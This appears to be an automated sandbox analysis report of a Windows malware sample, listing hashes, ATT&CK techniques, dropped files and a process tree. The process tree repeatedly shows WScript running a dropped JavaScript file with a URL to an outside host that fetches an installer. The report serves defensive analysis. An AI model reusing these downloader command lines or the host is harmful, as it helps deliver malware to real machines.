e9c53eaf8d74cbe1d533b1d1df6f3a6635fd3e21242fdb86ac0ea2b067699d8a

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
08/05/2024, 00:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe
Size

184KB
MD5

2265e05cc77c5bb31ec3ac5c67fa8809
SHA1

1fcb9ecb121aa41e2e47ac4501f26a3e69b814db
SHA256

e9c53eaf8d74cbe1d533b1d1df6f3a6635fd3e21242fdb86ac0ea2b067699d8a
SHA512

06667c1bdc98e9e5df3da0a70217654d682ac3dc9ac2497c39b84c950469ef752b8c5487ebf86a1e167247e86955056bdd50357697fd99dd7f22344b1b668904
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3N:/7BSH8zUB+nGESaaRvoB7FJNndno

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	1744	WScript.exe
8	1744	WScript.exe
10	1744	WScript.exe
12	2664	WScript.exe
13	2664	WScript.exe
15	2820	WScript.exe
16	2820	WScript.exe
18	2148	WScript.exe
19	2148	WScript.exe
23	2876	WScript.exe
24	2876	WScript.exe
26	2876	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 1744	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	28
PID 2348 wrote to memory of 1744	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	28
PID 2348 wrote to memory of 1744	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	28
PID 2348 wrote to memory of 1744	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	28
PID 2348 wrote to memory of 2664	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	30
PID 2348 wrote to memory of 2664	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	30
PID 2348 wrote to memory of 2664	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	30
PID 2348 wrote to memory of 2664	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	30
PID 2348 wrote to memory of 2820	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	32
PID 2348 wrote to memory of 2820	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	32
PID 2348 wrote to memory of 2820	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	32
PID 2348 wrote to memory of 2820	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	32
PID 2348 wrote to memory of 2148	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	34
PID 2348 wrote to memory of 2148	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	34
PID 2348 wrote to memory of 2148	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	34
PID 2348 wrote to memory of 2148	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	34
PID 2348 wrote to memory of 2876	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	36
PID 2348 wrote to memory of 2876	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	36
PID 2348 wrote to memory of 2876	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	36
PID 2348 wrote to memory of 2876	2348	2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2265e05cc77c5bb31ec3ac5c67fa8809_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA5D.js" http://www.djapp.info/?domain=vaqhjHarRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fufA5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:1744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA5D.js" http://www.djapp.info/?domain=vaqhjHarRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fufA5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2664
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA5D.js" http://www.djapp.info/?domain=vaqhjHarRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fufA5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2820
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA5D.js" http://www.djapp.info/?domain=vaqhjHarRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fufA5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2148
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufA5D.js" http://www.djapp.info/?domain=vaqhjHarRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgEFQ2K333LrcSBcSC5AosQUy-wm7otAI4nS08rU C:\Users\Admin\AppData\Local\Temp\fufA5D.exe
  2⤵
  - Blocklisted process makes network request
  PID:2876

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
af14424bd91fa356e225129fe451aacc

SHA1
4046dc95051bf8382196ff1fec36326c22dc1aae

SHA256
26f7df2742be7eae0cecb3954ab69d2f1ad25c6b63a21e3a477ea34dee8301ae

SHA512
362068ce189ee00c318b574ebc8fc4f2e09add21f6c79aea8fe2f69ece44c0beaeb6c7fec7297a0b758ea5b8879ab0e9993c74ab262e200e289c05833e734179

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
63300d8f415bd1915acf58f00a00a51c

SHA1
7be394011df2b6df353f5a30ef6ad1a655d68aab

SHA256
df0c087b5f2d41f140577207dfee2e53cba6f6b78f87d7d366174f68b0ecf102

SHA512
4281ff5c12026e16373e8a16a44cf52492ead172c3e10800064ee6ebe5f78d100ee8b97289e0fe2415a01b4c6c1a3cd07b86b334c7e569d4931d3da0e0b0721a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
373985953fd07f18630030a3a0e4873d

SHA1
457dfb73e622c6e6ab27e2e3705e235c3a5b9b20

SHA256
d5de8b43b6e26f051cc11347aa22bdb2ebd4f7e7a2d910000c457f34bcad2870

SHA512
7f93b25f21f900613a8c7c989381cef1ba3f94754069597bf746bb793f96f0b8a35b32a7e989ee617459047987cb3282eb9e2bdd1e41139f51948c0722160463

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
deac55046ac0b5059684e5bba6198fbd

SHA1
122e3aeac5e6299d2a90936ecd88e606ad448790

SHA256
8768f345dcab9b8723ffa8744d64629353f667dc3c2e7b6ce1051bf0e5b05ee0

SHA512
4e57a9b418f8b8ba3eea8b7d7247bea651acf679650372d0bbb039eebf5b061f2e3114ddd3d0b3d468af00b1e2547820c7bf6d942a40cd0d1be10f6e542fc5ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\domain_profile[1].htm

Filesize
6KB

MD5
44c2df209a8b8cc1ab6787b91da3d9a3

SHA1
2bcfa69a15327bf137198bd6c43d255de857b211

SHA256
f1b7d0d59ce6d0aa0a82ec7ab7379ce8090d154a6c1bee428c84c49eceeace30

SHA512
aa502a9b6c1acbb000d9e2ff0d0ed490bb03f9d4fe82e5f46c5b3e4251f5e02fe46db8908ef35c1768b983d62e831e951404b9d228c587dc3fb9b875e48af63f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\domain_profile[1].htm

Filesize
40KB

MD5
7380aec5fbe13903e13bdb000cdd0c1c

SHA1
18cd332f945e303c6345af296b276a857c6e8798

SHA256
c8a2c776b41be1319784022aeb5881abbea21bca25051ab6798f3a7447e016d9

SHA512
744d383615327d7b1fecaba82f590dfcbc44574d1b95500f510e893d5f5305aa70e4e52e46d45510dbae63df78057e8d895dfa88f9f81e80fa4405a7a12cdc93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\domain_profile[1].htm

Filesize
40KB

MD5
6e967036a83b9f50e29af331ad1c31d0

SHA1
a4ce9ccc3c4e009299e588af3e364079eddec27e

SHA256
3d7b3c5e70ae60b1f1279dc9e6a4f06f7cbe0655b5a0a1520a371b7d9909de74

SHA512
3d1408e21f777970dc7f0dc5c7d2ebe44b8d5fccf7ac4c93d5e970a4f8860c573c4306ce9737eba5b16568be9c89c397bea99779899106624e228e2f34eb042b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYNL6UIN\domain_profile[1].htm

Filesize
40KB

MD5
be09220b9239a651ff8750514d657f11

SHA1
7a7b2364e94dfd4c9a456e93a4d26cc811145f37

SHA256
62072dbbb0f94b041ef07c9ece5dea5ca2626c8547419c12f5f563c38bb9f9e4

SHA512
ce2b83f327cce4ed8308bb20cd7cef86da8147773b3a42d0f6630b1b389dce6215de0a32fe44b142e0602c91b3e6b4bf73951a6f8b43f60abb69e6f2a91b95e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3A04.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar565B.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufA5D.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DM344I02.txt

Filesize
175B

MD5
e63a1b0fb03f14098f7ba394bddd415b

SHA1
d1343e9404b8104c5ebdd55d3afe8022a3ea4764

SHA256
b6472982aaea3b5c3d64a80ba1117a6bcf9c08f68668b3512488d887d3e61677

SHA512
9014625c41f1de9dda943a92018a7f5ce07771d594341326eac5d2f79292930e8b2b6640412a29aeac1f90a34425bf89d442e89758f505bb1c46a6821dc87580

Download Submit